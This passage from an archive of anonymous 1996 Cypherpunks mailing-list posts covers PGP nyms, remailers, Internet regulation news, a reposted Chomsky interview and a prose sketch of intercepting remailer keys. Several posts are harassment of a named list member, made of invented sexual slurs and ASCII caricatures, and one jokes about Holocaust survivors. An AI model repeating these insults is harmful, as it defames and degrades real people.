led to his untimely dissapearance from the net, but i could be wrong.. I'd say that he could probably contribute a paragraph or two on the problems facing people who try to engage in "whistle-blowing" on the net,
and could give a few good reasons why you aren't finding more services dealing with this sort of thing. Anonymity is great, if you really have something to say, but unfortunately for many people anonymity is nothing but a tool to injure others with impunity.
"Peaceful confrontation, meet war machine."   -Slayer
  "This time, I'm voting with a bullet."      -Corrosion of Conformity

@_date: 1996-08-30 12:33:30
@_author: Anonymous 
@_subject: PGP & Default 
I created a nym with a public key.  Now, it's become the default so
when I go to send an encrypted message, I get prompted to enter the
password for my nym key.
   So, for the $64,000 question: How I can get my *original* public key (the one with my
"real" email address) to again be the default.
   Thx.

@_date: 1996-08-31 07:19:19
@_author: Anonymous 
@_subject: www.anonymizer.com 
Am I missing something here because isn't the easiest way around all of this is simply not to enter your personal info when setting up Netscape?  Granted the page can pick up your ISP and what port you used, but so what?  It can't get your name and email address.  Use a newsreader such as Free Agent so there's no reason to enter your personal info.  If there is a reason to respond to someone who's email is in on a particular page, then copy it and paste to your emailer...

@_date: 1996-12-01 07:01:34
@_author: Anonymous 
@_subject: Seditious Cable! 
dlv at bwalk.dm.com wrote to All:
 >> And these are the folks you want to maintain your key escrow?
 d> This is another example of lies being spread by John Gilmore and his
 d> cronies. I don't want the U.S. Government to maintain my or anyone
 d> else's key escrow.
I was basing my reply on the content of your earlier post.  It is
certainly possible that I misunderstood your views.  Please clarify your
position on key escrow to prevent further misunderstanding.
 d> Comments: All power to the ZOG!
Then please tell me that the above is an attempt at humor!

@_date: 1996-12-07 10:33:24
@_author: Anonymous 
@_subject: [STEGO] Firewalls 
Tim C[retin] Mayflower's wee-wee is so tiny that only his mommy is allowed to touch it.
\    \ \ \ \ \ \ \      __
  \    \ \ \ \ \ \ \   | O~-_ Tim C[retin] Mayflower
   >----|-|-|-|-|-|-|--|  __/
  /    / / / / / / /   |__\
/     / / / / / / /

@_date: 1996-12-10 11:16:41
@_author: Anonymous 
@_subject: [CRYPTO] E-Cash 
Tim C[reep] May uses an Adolf Hitler action figure as a dildo.
   ____
   \ _/__  Tim C[reep] May
    \\  /
      \/

@_date: 1996-12-12 22:54:55
@_author: Anonymous 
@_subject: [Meeting] Cypherpunks wanking club. 
There will be a meeting at my place for all cypherpunks so we can pull
each other dicks about how clever we are and bag all those non-entities
who aren't. All gun lovers are of course welcome and we can exhibit our
manhood paranoia by seeing who has the biggest calibre weapon. Having a
deadly weapon after all proves we are grown up, right kiddies.
Sufferin' Sam

@_date: 1996-12-15 13:46:26
@_author: Anonymous 
@_subject: Certified primes 
The only `culture' Timmy C[retin] Maytag possesses is that cultivated from his foreskin scrapings.
         /\ o-/\  Timmy C[retin] Maytag
        ///\|/\\\
       /   /|\   \

@_date: 1996-12-16 06:39:01
@_author: Anonymous 
@_subject: fwd: e-mail for free children's books for hospitals (fwd) 
Forwarded this anonymously so as not to get flames for being OFF
Spread the spirit of Christmas :-)

@_date: 1996-12-20 11:40:48
@_author: Name Withheld by Request 
@_subject: Dale defends free society from the NSApunks (was Re: Encryption ? 
I thought this was so funny I've saved it.
Perhaps we could vote on the quality of Dale's ideas
and arrive at an estimate of the proportion of NSA supporters on the list.
THE AKOND OF SWAT
   :Date: Thu, 19 Dec 1996 07:36:03 -0800
   :From: dthorn at gte.net (Dale Thorn)
   :To: SHARK    :Cc: cypherpunks at toad.com
   :Subject: Re: Encryption ?
   :
   :>    :> I am a Mathematic student at Bosphorus University in Turkey.
   :> I am interested in both computer applications and mathematical base of
   :> encryption.Where can I find this kind of staff on internet.
   :> Is it necessary to have high level of mathematical background in order to
   :> deal with encryption??
   :>    :> By the way Is there any member of this list from Turkey?
   :
   :There are a lot of NSA people here on cypherpunks, and they try very
   :hard to control encryption, to make everyone think it is difficult, to
   :discourage independent inquiry.
   :
   :That is the main reason they accuse people of being snakeoil vendors,
   :to discourage people from inquiring about really new ideas, like some
   :of my ideas for example.
   :
   :Just so you know....

@_date: 1996-12-24 16:46:07
@_author: Anonymous 
@_subject: Anarcho Noel 
Noam Chomsky on Anarchism, Marxism & Hope for the Future
Noam Chomsky is widely known for his critique of U.S foreign policy, and
for his work as a linguist. Less well known is his ongoing support for
libertarian socialist objectives. In a special interview done for Red and
Black Revolution, Chomsky gives his views on anarchism and marxism, and the
prospects for socialism now. The interview was conducted in May 1995 by
Kevin Doyle.
RBR: First off, Noam, for quite a time now you've been an advocate for the
anarchist idea. Many people are familiar with the introduction you wrote in
1970 to Daniel Guerin's Anarchism, but more recently, for instance in the
film Manufacturing Consent, you took the opportunity to highlight again the
potential of anarchism and the anarchist idea. What is it that attracts you
to anarchism?
CHOMSKY: I was attracted to anarchism as a young teenager, as soon as I
began to think about the world beyond a pretty narrow range, and haven't
seen much reason to revise those early attitudes since. I think it only
makes sense to seek out and identify structures of authority, hierarchy,
and domination in every aspect of life, and to challenge them; unless a
justification for them can be given, they are illegitimate, and should be
dismantled, to increase the scope of human freedom. That includes political
power, ownership and management, relations among men and women, parents and
children, our control over the fate of future generations (the basic moral
imperative behind the environmental movement, in my view), and much else.
Naturally this means a challenge to the huge institutions of coercion and
control: the state, the unaccountable private tyrannies that control most
of the domestic and international economy, and so on. But not only these.
That is what I have always understood to be the essence of anarchism: the
conviction that the burden of proof has to be placed on authority, and that
it should be dismantled if that burden cannot be met. Sometimes the burden
can be met. If I'm taking a walk with my grandchildren and they dart out
into a busy street, I will use not only authority but also physical
coercion to stop them. The act should be challenged, but I think it can
readily meet the challenge. And there are other cases; life is a complex
affair, we understand very little about humans and society, and grand
pronouncements are generally more a source of harm than of benefit. But the
perspective is a valid one, I think, and can lead us quite a long way.
Beyond such generalities, we begin to look at cases, which is where the
questions of human interest and concern arise.
RBR: It's true to say that your ideas and critique are now more widely
known than ever before. It should also be said that your views are widely
respected. How do you think your support for anarchism is received in this
context? In particular, I'm interested in the response you receive from
people who are getting interested in politics for the first time and who
may, perhaps, have come across your views. Are such people surprised by
your support for anarchism? Are they interested?
CHOMSKY: The general intellectual culture, as you know, associates
'anarchism' with chaos, violence, bombs, disruption, and so on. So people
are often surprised when I speak positively of anarchism and identify
myself with leading traditions within it. But my impression is that among
the general public, the basic ideas seem reasonable when the clouds are
cleared away. Of course, when we turn to specific matters - say, the nature
of families, or how an economy would work in a society that is more free
and just - questions and controversy arise. But that is as it should be.
Physics can't really explain how water flows from the tap in your sink.
When we turn to vastly more complex questions of human significance,
understanding is very thin, and there is plenty of room for disagreement,
experimentation, both intellectual and real-life exploration of
possibilities, to help us learn more.
RBR: Perhaps, more than any other idea, anarchism has suffered from the
problem of misrepresentation. Anarchism can mean many things to many
people. Do you often find yourself having to explain what it is that you
mean by anarchism? Does the misrepresentation of anarchism bother you?
CHOMSKY: All misrepresentation is a nuisance. Much of it can be traced back
to structures of power that have an interest in preventing understanding,
for pretty obvious reasons. It's well to recall David Hume's Principles of
Government. He expressed surprise that people ever submitted to their
rulers. He concluded that since Force is always on the side of the
governed, the governors have nothing to support them but opinion. 'Tis
therefore, on opinion only that government is founded; and this maxim
extends to the most despotic and most military governments, as well as to
the most free and most popular. Hume was very astute - and incidentally,
hardly a libertarian by the standards of the day. He surely underestimates
the efficacy of force, but his observation seems to me basically correct,
and important, particularly in the more free societies, where the art of
controlling opinion is therefore far more refined. Misrepresentation and
other forms of befuddlement are a natural concomitant.
So does misrepresentation bother me? Sure, but so does rotten weather. It
will exist as long as concentrations of power engender a kind of commissar
class to defend them. Since they are usually not very bright, or are bright
enough to know that they'd better avoid the arena of fact and argument,
they'll turn to misrepresentation, vilification, and other devices that are
available to those who know that they'll be protected by the various means
available to the powerful. We should understand why all this occurs, and
unravel it as best we can. That's part of the project of liberation - of
ourselves and others, or more reasonably, of people working together to
achieve these aims.
Sounds simple-minded, and it is. But I have yet to find much commentary on
human life and society that is not simple-minded, when absurdity and
self-serving posturing are cleared away.
RBR: How about in more established left-wing circles, where one might
expect to find greater familiarity with what anarchism actually stands for?
Do you encounter any surprise here at your views and support for anarchism?
CHOMSKY: If I understand what you mean by established left-wing circles,
there is not too much surprise about my views on anarchism, because very
little is known about my views on anything. These are not the circles I
deal with. You'll rarely find a reference to anything I say or write.
That's not completely true of course. Thus in the US (but less commonly in
the UK or elsewhere), you'd find some familiarity with what I do in certain
of the more critical and independent sectors of what might be called
established left-wing circles, and I have personal friends and associates
scattered here and there. But have a look at the books and journals, and
you'll see what I mean. I don't expect what I write and say to be any more
welcome in these circles than in the faculty club or editorial board room -
again, with exceptions.
The question arises only marginally, so much so that it's hard to answer.
RBR: A number of people have noted that you use the term 'libertarian
socialist' in the same context as you use the word 'anarchism'. Do you see
these terms as essentially similar? Is anarchism a type of socialism to
you? The description has been used before that anarchism is equivalent to
socialism with freedom. Would you agree with this basic equation?
CHOMSKY: The introduction to Guerin's book that you mentioned opens with a
quote from an anarchist sympathiser a century ago, who says that anarchism
has a broad back, and endures anything. One major element has been what has
traditionally been called 'libertarian socialism'. I've tried to explain
there and elsewhere what I mean by that, stressing that it's hardly
original; I'm taking the ideas from leading figures in the anarchist
movement whom I quote, and who rather consistently describe themselves as
socialists, while harshly condemning the 'new class' of radical
intellectuals who seek to attain state power in the course of popular
struggle and to become the vicious Red bureaucracy of which Bakunin warned;
what's often called 'socialism'. I rather agree with Rudolf Rocker's
perception that these (quite central) tendencies in anarchism draw from the
best of Enlightenment and classical liberal thought, well beyond what he
described. In fact, as I've tried to show they contrast sharply with
Marxist-Leninist doctrine and practice, the 'libertarian' doctrines that
are fashionable in the US and UK particularly, and other contemporary
ideologies, all of which seem to me to reduce to advocacy of one or another
form of illegitimate authority, quite often real tyranny.
The Spanish Revolution
RBR: In the past, when you have spoken about anarchism, you have often
emphasised the example of the Spanish Revolution. For you there would seem
to be two aspects to this example. On the one hand, the experience of the
Spanish Revolution is, you say, a good example of 'anarchism in action'. On
the other, you have also stressed that the Spanish revolution is a good
example of what workers can achieve through their own efforts using
participatory democracy. Are these two aspects - anarchism in action and
participatory democracy - one and the same thing for you? Is anarchism a
philosophy for people's power?
CHOMSKY: I'm reluctant to use fancy polysyllables like philosophy to refer
to what seems ordinary common sense. And I'm also uncomfortable with
slogans. The achievements of Spanish workers and peasants, before the
revolution was crushed, were impressive in many ways. The term
'participatory democracy' is a more recent one, which developed in a
different context, but there surely are points of similarity. I'm sorry if
this seems evasive. It is, but that's because I don't think either the
concept of anarchism or of participatory democracy is clear enough to be
able to answer the question whether they are the same.
RBR: One of the main achievements of the Spanish Revolution was the degree
of grassroots democracy established. In terms of people, it is estimated
that over 3 million were involved. Rural and urban production was managed
by workers themselves. Is it a coincidence to your mind that anarchists,
known for their advocacy of individual freedom, succeeded in this area of
collective administration?
CHOMSKY: No coincidence at all. The tendencies in anarchism that I've
always found most persuasive seek a highly organised society, integrating
many different kinds of structures (workplace, community, and manifold
other forms of voluntary association), but controlled by participants, not
by those in a position to give orders (except, again, when authority can be
justified, as is sometimes the case, in specific contingencies).
RBR: Anarchists often expend a great deal of effort at building up
grassroots democracy. Indeed they are often accused of taking democracy to
extremes. Yet, despite this, many anarchists would not readily identify
democracy as a central component of anarchist philosophy. Anarchists often
describe their politics as being about 'socialism' or being about 'the
individual'- they are less likely to say that anarchism is about democracy.
Would you agree that democratic ideas are a central feature of anarchism?
CHOMSKY: Criticism of 'democracy' among anarchists has often been criticism
of parliamentary democracy, as it has arisen within societies with deeply
repressive features. Take the US, which has been as free as any, since its
origins. American democracy was founded on the principle, stressed by James
Madison in the Constitutional Convention in 1787, that the primary function
of government is to protect the minority of the opulent from the majority.
Thus he warned that in England, the only quasi-democratic model of the day,
if the general population were allowed a say in public affairs, they would
implement agrarian reform or other atrocities, and that the American system
must be carefully crafted to avoid such crimes against the rights of
property, which must be defended (in fact, must prevail). Parliamentary
democracy within this framework does merit sharp criticism by genuine
libertarians, and I've left out many other features that are hardly subtle
- slavery, to mention just one, or the wage slavery that was bitterly
condemned by working people who had never heard of anarchism or communism
right through the 19th century, and beyond.
RBR: The importance of grassroots democracy to any meaningful change in
society would seem to be self evident. Yet the left has been ambiguous
about this in the past. I'm speaking generally, of social democracy, but
also of Bolshevism - traditions on the left that would seem to have more in
common with elitist thinking than with strict democratic practice. Lenin,
to use a well-known example, was sceptical that workers could develop
anything more than trade union consciousness- by which, I assume, he meant
that workers could not see far beyond their immediate predicament.
Similarly, the Fabian socialist, Beatrice Webb, who was very influential in
the Labour Party in England, had the view that workers were only interested
in horse racing odds! Where does this elitism originate and what is it
doing on the left?
CHOMSKY: I'm afraid it's hard for me to answer this. If the left is
understood to include 'Bolshevism,' then I would flatly dissociate myself
from the left. Lenin was one of the greatest enemies of socialism, in my
opinion, for reasons I've discussed. The idea that workers are only
interested in horse-racing is an absurdity that cannot withstand even a
superficial look at labour history or the lively and independent working
class press that flourished in many places, including the manufacturing
towns of New England not many miles from where I'm writing - not to speak
of the inspiring record of the courageous struggles of persecuted and
oppressed people throughout history, until this very moment. Take the most
miserable corner of this hemisphere, Haiti, regarded by the European
conquerors as a paradise and the source of no small part of Europe's
wealth, now devastated, perhaps beyond recovery. In the past few years,
under conditions so miserable that few people in the rich countries can
imagine them, peasants and slum-dwellers constructed a popular democratic
movement based on grassroots organisations that surpasses just about
anything I know of elsewhere; only deeply committed commissars could fail
to collapse with ridicule when they hear the solemn pronouncements of
American intellectuals and political leaders about how the US has to teach
Haitians the lessons of democracy. Their achievements were so substantial
and frightening to the powerful that they had to be subjected to yet
another dose of vicious terror, with considerably more US support than is
publicly acknowledged, and they still have not surrendered. Are they
interested only in horse-racing?
I'd suggest some lines I've occasionally quoted from Rousseau: when I see
multitudes of entirely naked savages scorn European voluptuousness and
endure hunger, fire, the sword, and death to preserve only their
independence, I feel that it does not behoove slaves to reason about
RBR: Speaking generally again, your own work - Deterring Democracy,
Necessary Illusions, etc. - has dealt consistently with the role and
prevalence of elitist ideas in societies such as our own. You have argued
that within 'Western' (or parliamentary) democracy there is a deep
antagonism to any real role or input from the mass of people, lest it
threaten the uneven distribution in wealth which favours the rich. Your
work is quite convincing here, but, this aside, some have been shocked by
your assertions. For instance, you compare the politics of President John
F. Kennedy with Lenin, more or less equating the two. This, I might add,
has shocked supporters of both camps! Can you elaborate a little on the
validity of the comparison?
CHOMSKY: I haven't actually equated the doctrines of the liberal
intellectuals of the Kennedy administration with Leninists, but I have
noted striking points of similarity - rather as predicted by Bakunin a
century earlier in his perceptive commentary on the new class. For example,
I quoted passages from McNamara on the need to enhance managerial control
if we are to be truly free, and about how the undermanagement that is the
real threat to democracy is an assault against reason itself. Change a few
words in these passages, and we have standard Leninist doctrine. I've
argued that the roots are rather deep, in both cases. Without further
clarification about what people find shocking, I can't comment further. The
comparisons are specific, and I think both proper and properly qualified.
If not, that's an error, and I'd be interested to be enlightened about it.
RBR: Specifically, Leninism refers to a form of marxism that developed with
V.I. Lenin. Are you implicitly distinguishing the works of Marx from the
particular criticism you have of Lenin when you use the term 'Leninism'? Do
you see a continuity between Marx's views and Lenin's later practices?
CHOMSKY: Bakunin's warnings about the Red bureaucracy that would institute
the worst of all despotic governments were long before Lenin, and were
directed against the followers of Mr. Marx. There were, in fact, followers
of many different kinds; Pannekoek, Luxembourg, Mattick and others are very
far from Lenin, and their views often converge with elements of
anarcho-syndicalism. Korsch and others wrote sympathetically of the
anarchist revolution in Spain, in fact. There are continuities from Marx to
Lenin, but there are also continuities to Marxists who were harshly
critical of Lenin and Bolshevism. Teodor Shanin's work in the past years on
Marx's later attitudes towards peasant revolution is also relevant here.
I'm far from being a Marx scholar, and wouldn't venture any serious
judgement on which of these continuities reflects the 'real Marx,' if there
even can be an answer to that question.
RBR: Recently, we obtained a copy of your own Notes On Anarchism
(re-published last year by Discussion Bulletin in the USA). In this you
mention the views of the early Marx, in particular his development of the
idea of alienation under capitalism. Do you generally agree with this
division in Marx's life and work - a young, more libertarian socialist but,
in later years, a firm authoritarian?
CHOMSKY: The early Marx draws extensively from the milieu in which he
lived, and one finds many similarities to the thinking that animated
classical liberalism, aspects of the Enlightenment and French and German
Romanticism. Again, I'm not enough of a Marx scholar to pretend to an
authoritative judgement. My impression, for what it is worth, is that the
early Marx was very much a figure of the late Enlightenment, and the later
Marx was a highly authoritarian activist, and a critical analyst of
capitalism, who had little to say about socialist alternatives. But those
are impressions.
RBR: From my understanding, the core part of your overall view is informed
by your concept of human nature. In the past the idea of human nature was
seen, perhaps, as something regressive, even limiting. For instance, the
unchanging aspect of human nature is often used as an argument for why
things can't be changed fundamentally in the direction of anarchism. You
take a different view? Why?
CHOMSKY: The core part of anyone's point of view is some concept of human
nature, however it may be remote from awareness or lack articulation. At
least, that is true of people who consider themselves moral agents, not
monsters. Monsters aside, whether a person who advocates reform or
revolution, or stability or return to earlier stages, or simply cultivating
one's own garden, takes stand on the grounds that it is 'good for people.'
But that judgement is based on some conception of human nature, which a
reasonable person will try to make as clear as possible, if only so that it
can be evaluated. So in this respect I'm no different from anyone else.
You're right that human nature has been seen as something 'regressive,' but
that must be the result of profound confusion. Is my granddaughter no
different from a rock, a salamander, a chicken, a monkey? A person who
dismisses this absurdity as absurd recognises that there is a distinctive
human nature. We are left only with the question of what it is - a highly
nontrivial and fascinating question, with enormous scientific interest and
human significance. We know a fair amount about certain aspects of it - not
those of major human significance. Beyond that, we are left with our hopes
and wishes, intuitions and speculations.
There is nothing regressive about the fact that a human embryo is so
constrained that it does not grow wings, or that its visual system cannot
function in the manner of an insect, or that it lacks the homing instinct
of pigeons. The same factors that constrain the organism's development also
enable it to attain a rich, complex, and highly articulated structure,
similar in fundamental ways to conspecifics, with rich and remarkable
capacities. An organism that lacked such determinative intrinsic structure,
which of course radically limits the paths of development, would be some
kind of amoeboid creature, to be pitied (even if it could survive somehow).
The scope and limits of development are logically related.
Take language, one of the few distinctive human capacities about which much
is known. We have very strong reasons to believe that all possible human
languages are very similar; a Martian scientist observing humans might
conclude that there is just a single language, with minor variants. The
reason is that the particular aspect of human nature that underlies the
growth of language allows very restricted options. Is this limiting? Of
course. Is it liberating? Also of course. It is these very restrictions
that make it possible for a rich and intricate system of expression of
thought to develop in similar ways on the basis of very rudimentary,
scattered, and varied experience.
What about the matter of biologically-determined human differences? That
these exist is surely true, and a cause for joy, not fear or regret. Life
among clones would not be worth living, and a sane person will only rejoice
that others have abilities that they do not share. That should be
elementary. What is commonly believed about these matters is strange
indeed, in my opinion.
Is human nature, whatever it is, conducive to the development of anarchist
forms of life or a barrier to them? We do not know enough to answer, one
way or the other. These are matters for experimentation and discovery, not
empty pronouncements.
The future
RBR: To begin finishing off, I'd like to ask you briefly about some current
issues on the left. I don't know if the situation is similar in the USA but
here, with the fall of the Soviet Union, a certain demoralisation has set
in on the left. It isn't so much that people were dear supporters of what
existed in the Soviet Union, but rather it's a general feeling that with
the demise of the Soviet Union the idea of socialism has also been dragged
down. Have you come across this type of demoralisation? What's your
response to it?
CHOMSKY: My response to the end of Soviet tyranny was similar to my
reaction to the defeat of Hitler and Mussolini. In all cases, it is a
victory for the human spirit. It should have been particularly welcome to
socialists, since a great enemy of socialism had at last collapsed. Like
you, I was intrigued to see how people - including people who had
considered themselves anti-Stalinist and anti-Leninist - were demoralised
by the collapse of the tyranny. What it reveals is that they were more
deeply committed to Leninism than they believed.
There are, however, other reasons to be concerned about the elimination of
this brutal and tyrannical system, which was as much socialist as it was
democratic (recall that it claimed to be both, and that the latter claim
was ridiculed in the West, while the former was eagerly accepted, as a
weapon against socialism - one of the many examples of the service of
Western intellectuals to power). One reason has to do with the nature of
the Cold War. In my view, it was in significant measure a special case of
the 'North-South conflict,' to use the current euphemism for Europe's
conquest of much of the world. Eastern Europe had been the original 'third
world,' and the Cold War from 1917 had no slight resemblance to the
reaction of attempts by other parts of the third world to pursue an
independent course, though in this case differences of scale gave the
conflict a life of its own. For this reason, it was only reasonable to
expect the region to return pretty much to its earlier status: parts of the
West, like the Czech Republic or Western Poland, could be expected to
rejoin it, while others revert to the traditional service role, the
ex-Nomenklatura becoming the standard third world elite (with the approval
of Western state-corporate power, which generally prefers them to
alternatives). That was not a pretty prospect, and it has led to immense
Another reason for concern has to do with the matter of deterrence and
non-alignment. Grotesque as the Soviet empire was, its very existence
offered a certain space for non-alignment, and for perfectly cynical
reasons, it sometimes provided assistance to victims of Western attack.
Those options are gone, and the South is suffering the consequences.
A third reason has to do with what the business press calls the pampered
Western workers with their luxurious lifestyles. With much of Eastern
Europe returning to the fold, owners and managers have powerful new weapons
against the working classes and the poor at home. GM and VW can not only
transfer production to Mexico and Brazil (or at least threaten to, which
often amounts to the same thing), but also to Poland and Hungary, where
they can find skilled and trained workers at a fraction of the cost. They
are gloating about it, understandably, given the guiding values.
We can learn a lot about what the Cold War (or any other conflict) was
about by looking at who is cheering and who is unhappy after it ends. By
that criterion, the victors in the Cold War include Western elites and the
ex-Nomenklatura, now rich beyond their wildest dreams, and the losers
include a substantial part of the population of the East along with working
people and the poor in the West, as well as popular sectors in the South
that have sought an independent path.
Such ideas tend to arouse near hysteria among Western intellectuals, when
they can even perceive them, which is rare. That's easy to show. It's also
understandable. The observations are correct, and subversive of power and
privilege; hence hysteria.
In general, the reactions of an honest person to the end of the Cold War
will be more complex than just pleasure over the collapse of a brutal
tyranny, and prevailing reactions are suffused with extreme hypocrisy, in
my opinion.
RBR: In many ways the left today finds itself back at its original starting
point in the last century. Like then, it now faces a form of capitalism
that is in the ascendancy. There would seem to be greater 'consensus'
today, more than at any other time in history, that capitalism is the only
valid form of economic organisation possible, this despite the fact that
wealth inequality is widening. Against this backdrop, one could argue that
the left is unsure of how to go forward. How do you look at the current
period? Is it a question of 'back to basics'? Should the effort now be
towards bringing out the libertarian tradition in socialism and towards
stressing democratic ideas?
CHOMSKY: This is mostly propaganda, in my opinion. What is called
'capitalism' is basically a system of corporate mercantilism, with huge and
largely unaccountable private tyrannies exercising vast control over the
economy, political systems, and social and cultural life, operating in
close co-operation with powerful states that intervene massively in the
domestic economy and international society. That is dramatically true of
the United States, contrary to much illusion. The rich and privileged are
no more willing to face market discipline than they have been in the past,
though they consider it just fine for the general population. Merely to
cite a few illustrations, the Reagan administration, which revelled in free
market rhetoric, also boasted to the business community that it was the
most protectionist in post-war US history - actually more than all others
combined. Newt Gingrich, who leads the current crusade, represents a
superrich district that receives more federal subsidies than any other
suburban region in the country, outside of the federal system itself. The
'conservatives' who are calling for an end to school lunches for hungry
children are also demanding an increase in the budget for the Pentagon,
which was established in the late 1940s in its current form because - as
the business press was kind enough to tell us - high tech industry cannot
survive in a pure, competitive, unsubsidized, 'free enterprise' economy,
and the government must be its saviour. Without the saviour, Gingrich's
constituents would be poor working people (if they were lucky). There would
be no computers, electronics generally, aviation industry, metallurgy,
automation, etc., etc., right down the list. Anarchists, of all people,
should not be taken in by these traditional frauds.
More than ever, libertarian socialist ideas are relevant, and the
population is very much open to them. Despite a huge mass of corporate
propaganda, outside of educated circles, people still maintain pretty much
their traditional attitudes. In the US, for example, more than 80% of the
population regard the economic system as inherently unfair and the
political system as a fraud, which serves the special interests, not the
people. Overwhelming majorities think working people have too little voice
in public affairs (the same is true in England), that the government has
the responsibility of assisting people in need, that spending for education
and health should take precedence over budget-cutting and tax cuts, that
the current Republican proposals that are sailing through Congress benefit
the rich and harm the general population, and so on. Intellectuals may tell
a different story, but it's not all that difficult to find out the facts.
RBR: To a point anarchist ideas have been vindicated by the collapse of the
Soviet Union - the predictions of Bakunin have proven to be correct. Do you
think that anarchists should take heart from this general development and
from the perceptiveness of Bakunin's analysis? Should anarchists look to
the period ahead with greater confidence in their ideas and history?
CHOMSKY: I think - at least hope - that the answer is implicit in the
above. I think the current era has ominous portent, and signs of great
hope. Which result ensues depends on what we make of the opportunities.
RBR: Lastly, Noam, a different sort of question. We have a pint of Guinness
on order for you here. When are you going to come and drink it?
CHOMSKY: Keep the Guinness ready. I hope it won't be too long. Less
jocularly, I'd be there tomorrow if we could. We (my wife came along with
me, unusual for these constant trips) had a marvellous time in Ireland, and
would love to come back. Why don't we? Won't bore you with the sordid
details, but demands are extraordinary, and mounting - a reflection of the
conditions I've been trying to describe.
 --

@_date: 1996-12-26 10:19:59
@_author: Anonymous 
@_subject: Diffie-Hellman 
The only `culture' Timmy May possesses is that cultivated from his foreskin scrapings.
   ))))
  ))  OO  Timmy May
  6   (_)
  `____c

@_date: 1996-12-30 21:28:05
@_author: Anonymous 
@_subject: premail. 
A scenario:
1) The spooks put a bug (named Eve) on the link between
kiwi.cs.berkeley.edu and the Internet.
   Whenever kiwi.cs.berkeley.edu sents out the pubring.pgp Eve intercepts
it and replaces it with a file of the spooks' choosing. This file will
selectively replace the public pgp keys of some of the remailers (say exon)
in pubring.pgp with keys to which the spooks know the private key.
2) A similar bug is put on the link between the exon remailer and the
internet. All email to exon is intercepted, and if found to be encrypted
with the spooks' PGP key, it is decrypted, saved, re-encrypted with exon's
real PGP key and sent on.
It is only a scenario. I am still using premail to send this.

@_date: 1996-02-02 14:50:47
@_author: Anonymous 
@_subject: Nu? 
Tim May, 2/1/96, 10:39:
   We have an old saying, Tim, "Nisht geshtoygen, nisht gefloygen," which
more or less means "You're making no sense" - literally, "You're not
standing, you're not flying." I'll bow to you on CP-related matters any
day, but on the subject of Yiddish culture you're clearly pretty clueless.
No great loss, I assure you.
   ObCrypto: Reputations are subject-specific, not global. Your reputation
on the Holocaust is nill, about the same as my relatives' (the ones with
the funny striped suits and tattoos on their forearms) reputations are on
the subject of encryption.    Stick to crypto, folks - this isn't Shoah-punks.

@_date: 1996-02-03 00:43:06
@_author: Anonymous 
@_subject: Police PR Mendacity 
Financial Times, 2 Feb 1996
Governments around the world are taking action to police
computer networks
By Our Foreign Staff
The US Congress last night passed legislation that
imposes stiff penalties for the distribution of
"indecent" material on the Internet, a global web of
computer networks that can be reached by an estimated 30m
computer users.
The action echoes moves by other leading industrial
countries to bring the Internet under some form of
control. It coincides with a call by French officials for
an international law on communications to deal with
regulation of electronic publishing on the Net.
In Japan, meanwhile, Tokyo police have made what are
believed to be the first arrests in a crackdown on the
distribution of pornography via computer networks.
The rapid growth of the Internet has created widespread
concerns about its use to distribute pornography, racial
hate messages and other offensive materials. However the
vast bulk of material published on the global computer
network is commercial or technical in nature.
The measures passed in the US Congress, which were
attached to a broad Telecommunications Bill, for the
first time place legal limits on the types of materials
that can be distributed via computer networks.
Government intervention is strongly opposed by Internet
pioneers, and by many within the computer industry, who
believe that rapid growth of the Internet and electronic
commerce will be stunted by regulation. Moreover, legal
experts say that the regulation of cyberspace raises
complex issues about jurisdiction because the Internet
carries information across national borders.
In France, the issue has been brought to a head by the
recent publication, on the Internet, of "Le Grand Secret"
(The Big Secret), a book about Francois Mitterrand's
battle with cancer written by Dr Claude Gubler, the late
president's personal physician, which has been banned by
the French courts. Mr Francois Fillon, post and telecoms
minister, said in the French Senate yesterday that he was
to propose to a March meeting of EU culture and telecoms
ministers an international conference to debate a law.
He said the government was creating a working group with
representatives from the ministries of justice, culture
and telecoms, and stressed that his concerns included the
problem of dealing with regulation outside national
boundaries and the difficulty of pursuing those who
abused the system.
He also suggested the possibility of introducing ethical
codes for Internet operators along the lines of those
already in place for the country's Minitel telephone-
based information system.
In Japan, where use of the Internet is growing rapidly,
the legality of publishing pornography on computer
networks is about to be tested in the courts following
the first arrests for allegedly criminal use of the
Tokyo police announced that they had arrested a
28-year-old businessman, Mr Hiroshi Kamekura, on
suspicion of distributing pornographic pictures. He is
alleged to have produced the images at home and
distributed them on his home page since last month, said
police. According to Mr Kamekura, the service was popular
and he was asked by other Internet users to produce more
provocative pictures.
Police also arrested a high school student, accused of
distributing pornographic pictures over the Internet
since last September. The arrests may raise eyebrows in
a country where graphic, frequently sadistic pornography,
moderated only by a ban on depictions of pubic hair, is
openly sold on book stalls everywhere.
A German court has already acted to prevent users in that
country from accessing sexually explicit Internet
discussion groups. The court forced Compuserve, a
US-based online information service, to block access to
about 200 of the thousands of "Usenet" groups to be found
on the Internet.

@_date: 1996-02-03 01:35:41
@_author: Anonymous 
@_subject: Espionage-enabled Greed 
To follow up the GNN report on Net espionage and NSA For a quick overview of the prime sites for sniffing, see
the informative map of the major US NAP's, routers and
interconnections at:
   MAE-East, MAE-West, MAE-Chicago and others are detailed
   AltaVista offers more about the Routing Arbiter project -
- for examples,  rrdb.ra.net; rrdb.merit.edu;
isi.com -- as well as about FIX-East and FIX-West, various NAP's and the international exchanges and Is there technology for eluding these espionage-enabled
chokepoints -- tunneling, satellite-richochet or The newly announced Planet 1 personal satellite phone
system, $2,500 a unit, could it provide secure privacy off the heirarchical telecomm throttle? Or, are all
options slowly being shutdown by regulated greed?

@_date: 1996-02-03 09:59:15
@_author: Anonymous 
@_subject: Don't shot till you see the gray of their eyes 
Now I understand it.
That thing on the cover of Applied Crypto is really
one of the Gray's space ships that they use to abduct
aspiring cryptographers and implant microchips in them,
controlling their minds and making them obey RSA's
license agreement.
Very interesting indeed.
On a lighter note, a local NBC station advertised a
special they will have this monday, about the 1-800-INFO-PET
chips... only that parents are opting to have them implanted
in their newborn children.

@_date: 1996-02-03 11:45:38
@_author: Anonymous 
@_subject: What is this threat? 
The USG offers a $500,000 reward for stopping:
   Perception management and active measures activities.
The FBI DECA terms it one of seven "foreign intelligence activities that are deemed to be significant threats to  U.S. national security interests."
URL: DECA (pronounced "DECK-UH") is the FBI's program for the
Development of Espionage, Counterintelligence and
Counterterrorism Awareness. The DECA program disseminates
information concerning national security matters.
The FBI is the lead counterintelligence agency in the
United States. It has the principal authority to conduct
and coordinate counterintelligence and counterterrorism
investigations and operations within the United States.
The FBI, supported by other U.S. agencies as needed,
conducts espionage investigations when the subject of the investigation is not under the jurisdiction of the
Department of Defense, Uniform Code of Military Justice.
NATIONAL SECURITY THREAT LIST
The FBI's foreign counterintelligence mission is set out
